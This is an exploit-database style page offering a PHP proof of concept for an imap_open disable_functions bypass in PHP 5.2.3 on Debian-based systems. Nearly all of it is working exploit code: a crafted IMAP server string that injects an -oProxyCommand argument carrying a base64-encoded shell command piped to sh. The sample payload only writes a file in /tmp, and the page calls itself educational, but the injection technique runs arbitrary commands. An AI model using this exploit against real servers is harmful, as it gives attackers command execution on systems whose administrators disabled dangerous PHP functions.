Php 5.2.3 imap (debian based) imap_open disable_functions bypass Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-11-14 | Type : local | Platform : linux
This exploit / vulnerability Php 5.2.3 imap (debian based) imap_open disable_functions bypass is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

<?php
# https://antichat.com/threads/463395/#post-4254681
# echo '1234567890'>/tmp/test0001

$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";

imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());